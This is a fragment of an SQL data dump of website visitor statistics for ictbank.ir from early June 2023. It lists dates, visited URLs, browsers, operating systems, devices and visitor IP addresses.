(33777,'2023-06-04','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(33778,'2023-06-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(33779,'2023-06-04','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.156.162.169','000',0,1,0),
(33780,'2023-06-04','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','66.146.234.211','000',0,1,0),
(33781,'2023-06-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,4,0),
(33782,'2023-06-04','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.198.77.190','000',0,1,0),
(33783,'2023-06-04','https://ictbank.ir/dashtpodcast/wp-content/uploads/2020/04/Morteza-Ahmadi-Del-Bede.mp3','Safari','iOS','15.0.0','mobile:smart','iPhone','','5.208.134.196','000',0,3,0),
(33784,'2023-06-04','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','74.208.29.92','000',0,2,0),
(33785,'2023-06-04','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.250.241','000',0,1,0),
(33786,'2023-06-04','https://ictbank.ir/golrang_payment/major_buyers/index.php','Samsung Internet','Android','21.0','mobile:smart','Galaxy S21 FE','','192.15.10.17','000',0,6,0),
(33787,'2023-06-04','https://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','51.254.199.11','000',0,1,0),
(33788,'2023-06-04','https://ictbank.ir/golrang_payment/major_buyers/','Safari','iOS','16.0','mobile:smart','iPhone','','31.172.80.218','000',0,11,0),
(33789,'2023-06-05','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','45.43.36.191','000',0,3,0),
(33790,'2023-06-05','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','5.196.176.254','000',0,1,0),
(33791,'2023-06-05','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.198.117.210','000',0,1,0),
(33792,'2023-06-05','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(33793,'2023-06-05','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(33794,'2023-06-05','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(33795,'2023-06-05','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','46.105.57.120','000',0,15,0),
(33796,'2023-06-05','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','178.254.29.124','000',0,1,0),
(33797,'2023-06-05','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,4,0),
(33798,'2023-06-05','https://ictbank.ir/golrang_payment/major_buyers/','Safari','iOS','14.0.0','mobile:smart','iPhone','','172.93.179.12','000',0,1,0),
(33799,'2023-06-05','https://ictbank.ir/golrang_payment/major_buyers/','Safari','iOS','14.0.0','mobile:smart','iPhone','','5.52.16.30','000',0,6,0),
(33800,'2023-06-05','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','46.228.199.158','000',0,1,0),
(33801,'2023-06-05','https://45.92.94.221/blog','Firefox','Windows','79.0','desktop','Unknown','','164.52.0.92','000',0,1,0),
(33802,'2023-06-05','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,4,0),
(33803,'2023-06-05','https://ictbank.ir/blog','Safari','iOS','13.0','mobile:smart','iPhone','','188.120.224.183','000',0,1,0),
(33804,'2023-06-05','https://ictbank.ir/blog','Chrome','Windows','87.0.0.0','desktop','Unknown','','188.124.37.185','000',0,1,0),
(33805,'2023-06-05','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','92.205.1.58','000',0,1,0),
(33806,'2023-06-05','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','146.0.42.12','000',0,1,0),
(33807,'2023-06-05','https://ictbank.ir/golrang_payment/major_buyers/index.php','Chrome','Android','114.0.0.0','mobile:smart','Nexus 5','','5.238.244.167','000',0,8,0),
(33808,'2023-06-05','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','85.215.104.222','000',0,2,0),
(33809,'2023-06-05','https://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','94.247.172.129','000',0,1,0),
(33810,'2023-06-05','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.150.169','000',0,9,0),
(33811,'2023-06-05','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(33812,'2023-06-05','https://ictbank.ir/blog','Firefox','Windows','40.0','desktop','Unknown','','193.32.87.46','000',0,1,0),
(33813,'2023-06-05','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','176.9.114.107','000',0,1,0),
(33814,'2023-06-05','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,6,0),
(33815,'2023-06-05','https://ictbank.ir/golrang_payment/major_buyers/','Samsung Internet','Android','21.0','mobile:smart','Galaxy S21 FE','','46.164.100.202','000',0,5,0),
(33816,'2023-06-05','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(33817,'2023-06-05','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','192.36.109.127','000',0,1,0),
(33818,'2023-06-05','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','192.36.109.105','000',0,1,0),
(33819,'2023-06-05','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','192.36.109.73','000',0,1,0),
(33820,'2023-06-05','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','192.36.109.125','000',0,1,0),
(33821,'2023-06-05','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(33822,'2023-06-05','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,1,0),
(33823,'2023-06-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.137','000',0,1,0),
(33824,'2023-06-05','https://ictbank.ir/golrang_payment/major_buyers/','Chrome','Android','113.0.0.0','mobile:smart','Unknown','','5.127.183.115','000',0,1,0),
(33825,'2023-06-05','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.214.49','000',0,1,0),
(33826,'2023-06-05','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','45.154.98.14','000',0,21,0),
(33827,'2023-06-05','https://www.google.com/','Edge','Windows','114.0.0.0','desktop','Unknown','','155.190.21.26','000',0,1,0),
(33828,'2023-06-05','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','45.77.42.214','000',0,1,0),
(33829,'2023-06-05','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.48','000',0,2,0),
(33830,'2023-06-05','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.148.157.88','000',0,1,0),
(33831,'2023-06-05','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Firefox','OS X','102.0','desktop','Macintosh','','5.161.112.209','000',0,1,0),
(33832,'2023-06-05','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Firefox','OS X','102.0','desktop','Macintosh','','5.161.198.166','000',0,1,0),
(33833,'2023-06-05','https://ictbank.ir/pwa-master/','Chrome','Android','112.0.0.0','mobile:smart','Unknown','','52.12.124.89','000',0,1,0),
(33834,'2023-06-05','https://ictbank.ir/blog','Firefox','Windows','58.0','desktop','Unknown','','185.81.157.51','000',0,14,0),
(33835,'2023-06-06','https://ictbank.ir/blog','Chrome','OS X','84.0.0.0','desktop','Macintosh','','173.231.58.194','000',0,1,0),
(33836,'2023-06-06','https://ictbank.ir/blog','Chrome','OS X','84.0.0.0','desktop','Macintosh','','173.231.59.154','000',0,1,0),
(33837,'2023-06-06','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','147.78.47.22','000',0,1,0),
(33838,'2023-06-06','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.128.95.221','000',0,1,0),
(33839,'2023-06-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,14,0),
(33840,'2023-06-06','https://www.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.136.78','000',0,2,0),
(33841,'2023-06-06','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.219.196.55','000',0,1,0),
(33842,'2023-06-06','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','193.201.8.40','000',0,1,0),
(33843,'2023-06-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(33844,'2023-06-06','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','67.20.149.197','000',0,1,0),
(33845,'2023-06-06','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.244.114.206','000',0,1,0),
(33846,'2023-06-06','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.147','000',0,1,0),
(33847,'2023-06-06','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.137','000',0,2,0),
(33848,'2023-06-06','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(33849,'2023-06-06','https://ictbank.ir/blog','Chrome','Windows','114.0.0.0','desktop','Unknown','','103.98.63.180','000',0,1,0),
(33850,'2023-06-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(33851,'2023-06-06','http://ictbank.ir/blog/+WordPress','Chrome','OS X','103.0.0.0','desktop','Macintosh','','176.106.247.22','000',0,3,0),
(33852,'2023-06-06','https://ictbank.ir/golrang_payment/major_buyers/','Samsung Internet','Android','21.0','mobile:smart','Galaxy S21 FE','','5.238.244.167','000',0,22,0),
(33853,'2023-06-06','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.177.196','000',0,1,0),
(33854,'2023-06-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(33855,'2023-06-06','https://ictbank.ir/golrang_payment/major_buyers/','Chrome','Android','113.0.0.0','mobile:smart','Unknown','','52.12.124.89','000',0,3,0),
(33856,'2023-06-06','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.16','000',0,1,0),
(33857,'2023-06-06','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.167','000',0,1,0),
(33858,'2023-06-06','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.48','000',0,1,0),
(33859,'2023-06-06','https://ictbank.ir/blog','Chrome','Windows','58.0.0.0','desktop','Unknown','','18.185.111.238','000',0,20,0),
(33860,'2023-06-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(33861,'2023-06-06','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','37.187.215.254','000',0,2,0),
(33862,'2023-06-06','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','138.68.63.66','000',0,5,0),
(33863,'2023-06-06','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.198.5.191','000',0,1,0),
(33864,'2023-06-06','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','192.36.109.118','000',0,1,0),
(33865,'2023-06-06','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','192.36.109.96','000',0,1,0),
(33866,'2023-06-06','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','192.36.109.82','000',0,1,0),
(33867,'2023-06-06','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','192.36.109.94','000',0,1,0),
(33868,'2023-06-06','https://ictbank.ir/blog','Chrome','Windows','37.0.0.0','desktop','Unknown','','173.205.85.55','000',0,1,0),
(33869,'2023-06-06','https://ictbank.ir/blog','Edge','Windows','114.0.0.0','desktop','Unknown','','5.126.185.212','000',0,1,0),
(33870,'2023-06-06','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(33871,'2023-06-06','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,1,0),
(33872,'2023-06-06','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','92.222.70.66','000',0,1,0),
(33873,'2023-06-06','https://www.google.com/','Chrome','Linux','107.0.0.0','desktop','Unknown','','152.57.232.174','000',0,2,0),
(33874,'2023-06-06','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.185.82.142','000',0,1,0),
(33875,'2023-06-06','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(33876,'2023-06-06','https://ictbank.ir/CMDB/admin/','Chrome','OS X','114.0.0.0','desktop','Macintosh','','2.176.230.97','000',0,10,0),
(33877,'2023-06-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,4,0),
(33878,'2023-06-06','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','31.59.116.140','000',0,31,0),
(33879,'2023-06-06','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(33880,'2023-06-06','https://ictbank.ir/blog','Chrome','Linux','81.0.0.0','desktop','Unknown','','2.57.122.71','000',0,2,0),
(33881,'2023-06-06','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','71.6.165.200','000',0,2,0),
(33882,'2023-06-06','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','83.244.31.160','000',0,3,0),
(33883,'2023-06-06','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','114.0.0.0','desktop','Unknown','','217.218.196.17','000',0,65,0),
(33884,'2023-06-06','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(33885,'2023-06-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(33886,'2023-06-06','https://ictbank.ir/golrang_payment/major_buyers/sw.js','Samsung Internet','Android','21.0','mobile:smart','Galaxy S21+','','5.113.171.90','000',0,1,0),
(33887,'2023-06-06','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','135.148.2.40','000',0,1,0),
(33888,'2023-06-06','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','148.72.211.177','000',0,1,0),
(33889,'2023-06-06','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','94.102.49.193','000',0,1,0),
(33890,'2023-06-06','https://45.92.94.221:443/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','165.227.48.61','000',0,2,0),
(33891,'2023-06-06','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Chrome','OS X','103.0.0.0','desktop','Macintosh','','172.86.122.204','000',0,2,0),
(33892,'2023-06-06','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,1,0),
(33893,'2023-06-06','https://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.132.214','000',0,1,0),
(33894,'2023-06-06','https://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','213.32.122.82','000',0,1,0),
(33895,'2023-06-06','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(33896,'2023-06-07','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.190','000',0,2,0),
(33897,'2023-06-07','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.219.48.42','000',0,1,0),
(33898,'2023-06-07','https://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(33899,'2023-06-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,6,0),
(33900,'2023-06-07','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','143.244.175.97','000',0,2,0),
(33901,'2023-06-07','https://ictbank.ir/blog','Chrome','OS X','76.0.0.0','desktop','Macintosh','','8.218.164.38','000',0,2,0),
(33902,'2023-06-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(33903,'2023-06-07','https://ictbank.ir/blog','Chrome','Windows','72.0.0.0','desktop','Unknown','','88.230.4.31','000',0,2,0),
(33904,'2023-06-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.18','000',0,6,0),
(33905,'2023-06-07','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.53','000',0,2,0),
(33906,'2023-06-07','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','185.110.189.65','000',0,4,0),
(33907,'2023-06-07','https://ictbank.ir/blog','Chrome','Windows','89.0.0.0','desktop','Unknown','','147.78.47.230','000',0,2,0),
(33908,'2023-06-07','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.130.123.64','000',0,1,0),
(33909,'2023-06-07','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','167.71.193.71','000',0,1,0),
(33910,'2023-06-07','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','51.83.238.159','000',0,1,0),
(33911,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.220.101.34','000',0,1,0),
(33912,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','107.189.8.238','000',0,1,0),
(33913,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.220.101.33','000',0,1,0),
(33914,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','23.128.248.25','000',0,2,0),
(33915,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.106.93.141','000',0,1,0),
(33916,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','23.137.251.61','000',0,1,0),
(33917,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.220.101.183','000',0,1,0),
(33918,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.220.101.40','000',0,1,0),
(33919,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','144.217.86.109','000',0,1,0),
(33920,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.220.100.253','000',0,4,0),
(33921,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','109.70.100.73','000',0,1,0),
(33922,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.112.147.10','000',0,2,0),
(33923,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','23.129.64.225','000',0,2,0),
(33924,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','107.189.5.121','000',0,1,0),
(33925,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','162.247.74.27','000',0,1,0),
(33926,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','64.5.123.66','000',0,1,0),
(33927,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.220.101.157','000',0,1,0),
(33928,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','162.247.74.216','000',0,2,0),
(33929,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.106.94.195','000',0,2,0),
(33930,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.254.75.55','000',0,2,0),
(33931,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','23.128.248.23','000',0,1,0),
(33932,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.220.101.181','000',0,1,0),
(33933,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.220.101.52','000',0,1,0),
(33934,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','146.59.233.33','000',0,3,0),
(33935,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.220.102.248','000',0,3,0),
(33936,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.220.100.255','000',0,3,0),
(33937,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','5.255.124.150','000',0,2,0),
(33938,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','146.59.44.45','000',0,1,0),
(33939,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.220.103.120','000',0,1,0),
(33940,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.220.101.39','000',0,1,0),
(33941,'2023-06-07','https://ictbank.ir/blog','Chrome','iOS','25.0.0.0','mobile:smart','iPhone','','185.220.101.46','000',0,1,0),
(33942,'2023-06-07','https://ictbank.ir/golrang_payment/admin/index.php?pid=reports','Chrome','OS X','114.0.0.0','desktop','Macintosh','','5.238.244.167','000',0,45,0),
(33943,'2023-06-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,8,0),
(33944,'2023-06-07','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,12,0),
(33945,'2023-06-07','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.127.185','000',0,1,0),
(33946,'2023-06-07','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','43.154.73.87','000',0,1,0),
(33947,'2023-06-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.188','000',0,1,0),
(33948,'2023-06-07','https://ictbank.ir/pwa-master/','Chrome','Android','113.0.0.0','mobile:smart','Unknown','','104.28.246.162','000',0,1,0),
(33949,'2023-06-07','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(33950,'2023-06-07','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','159.89.180.236','000',0,1,0),
(33951,'2023-06-07','https://ns11.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.143','000',0,2,0),
(33952,'2023-06-07','https://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(33953,'2023-06-07','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','37.187.215.243','000',0,1,0),
(33954,'2023-06-07','https://ictbank.ir/golrang_payment/admin/index.php?pid=reports','Chrome','OS X','114.0.0.0','desktop','Macintosh','','52.12.124.89','000',0,1,0),
(33955,'2023-06-07','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','15.204.182.106','000',0,2,0),
(33956,'2023-06-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(33957,'2023-06-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(33958,'2023-06-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(33959,'2023-06-07','https://ictbank.ir/blog','Chrome','Windows','56.0.0.0','desktop','Unknown','','52.90.100.143','000',0,1,0),
(33960,'2023-06-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,4,0),
(33961,'2023-06-07','https://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','185.233.19.36','000',0,1,0),
(33962,'2023-06-07','https://l.instagram.com/','Instagram','iOS','281.0.0.0.0','mobile:smart','iPhone XR','','5.161.147.176','000',0,1,0),
(33963,'2023-06-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(33964,'2023-06-07','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Edge','OS X','103.0.0.0','desktop','Macintosh','','104.234.118.179','000',0,2,0),
(33965,'2023-06-08','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,4,0),
(33966,'2023-06-08','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','130.255.166.142','000',0,1,0),
(33967,'2023-06-08','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','130.255.166.69','000',0,1,0),
(33968,'2023-06-08','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','130.255.166.11','000',0,1,0),
(33969,'2023-06-08','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','130.255.166.115','000',0,1,0),
(33970,'2023-06-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(33971,'2023-06-08','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(33972,'2023-06-08','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(33973,'2023-06-08','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(33974,'2023-06-08','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,14,0),
(33975,'2023-06-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,4,0),
(33976,'2023-06-08','https://www.google.com/','Chrome','Linux','114.0.0.0','desktop','Unknown','','195.250.81.203','000',0,1,0),
(33977,'2023-06-08','https://www.ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','118.193.36.232','000',0,1,0),
(33978,'2023-06-08','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.197.60.186','000',0,1,0),
(33979,'2023-06-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(33980,'2023-06-08','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.46','000',0,2,0),
(33981,'2023-06-08','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.190','000',0,2,0),
(33982,'2023-06-08','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.201.41.8','000',0,1,0),
(33983,'2023-06-08','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.185.254','000',0,26,0),
(33984,'2023-06-08','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','192.64.4.29','000',0,10,0),
(33985,'2023-06-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(33986,'2023-06-08','https://ictbank.ir/blog','Firefox','Windows','40.0','desktop','Unknown','','193.32.87.46','000',0,1,0),
(33987,'2023-06-08','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Opera','OS X','89.0.0.0','desktop','Macintosh','','104.234.118.179','000',0,2,0),
(33988,'2023-06-08','https://nikan-ai.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','101.36.107.48','000',0,2,0),
(33989,'2023-06-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,1,0),
(33990,'2023-06-08','https://45.92.94.221:443/blog','Firefox','OS X','32.0','desktop','Macintosh','','148.153.56.82','000',0,8,0),
